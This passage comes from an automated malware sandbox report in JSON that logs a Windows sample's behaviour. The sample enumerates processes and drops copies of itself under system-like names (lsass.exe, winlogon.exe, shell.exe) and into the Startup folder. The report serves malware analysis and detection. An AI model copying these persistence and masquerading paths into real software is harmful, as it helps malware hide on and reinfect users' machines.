{\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1308\"}\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1424\"}\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1528\"}\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1604\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" opened \"\\Device\\KsecDD\"\n \"D3_08.exe\" opened \"\\Device\\KsecDD\"\n \"IExplorer.exe\" opened \"\\Device\\KsecDD\"\n \"WINLOGON.EXE\" opened \"\\Device\\KsecDD\"\n \"CSRSS.EXE\" opened \"\\Device\\KsecDD\"\n \"SERVICES.EXE\" opened \"\\Device\\KsecDD\"\n \"LSASS.EXE\" opened \"\\Device\\KsecDD\"\n \"SMSS.EXE\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"D3_08.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"D3_08.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\Users\\HAPUBWS\\AppData\\Local\\winlogon.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\Users\\HAPUBWS\\AppData\\Local\\lsass.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46851 bytes starting with PE header signature to file \"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46897 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46788 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46901 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46688 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46824 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46908 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46891 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46969 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46955 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46819 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46834 bytes starting with PE header signature to file \"C:\\D3_08\\New Folder.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46755 bytes starting with PE header signature to file \"C:\\Data %OSUSER%.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46774 bytes starting with PE header signature to file \"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46811 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46671 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46723 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46757 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46794 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46802 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46905 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46884 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46667 bytes starting with PE header signature to file \"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46866 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46807 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46818 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46942 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46910 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46797 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46962 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46767 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46830 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46886 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46746 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 46874 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\D3_08\\New Folder.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\Data HAPUBWS.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46764 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46797 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46903 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 47018 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46824 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46881 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46931 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46833 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46807 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46834 bytes starting with PE header signature to file \"C:\\D3_08\\New Folder.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46788 bytes starting with PE header signature to file \"C:\\Data %OSUSER%.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46674 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46817 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46858 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46794 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46906 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46861 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46886 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46796 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46917 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46881 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46773 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46719 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46861 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46947 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 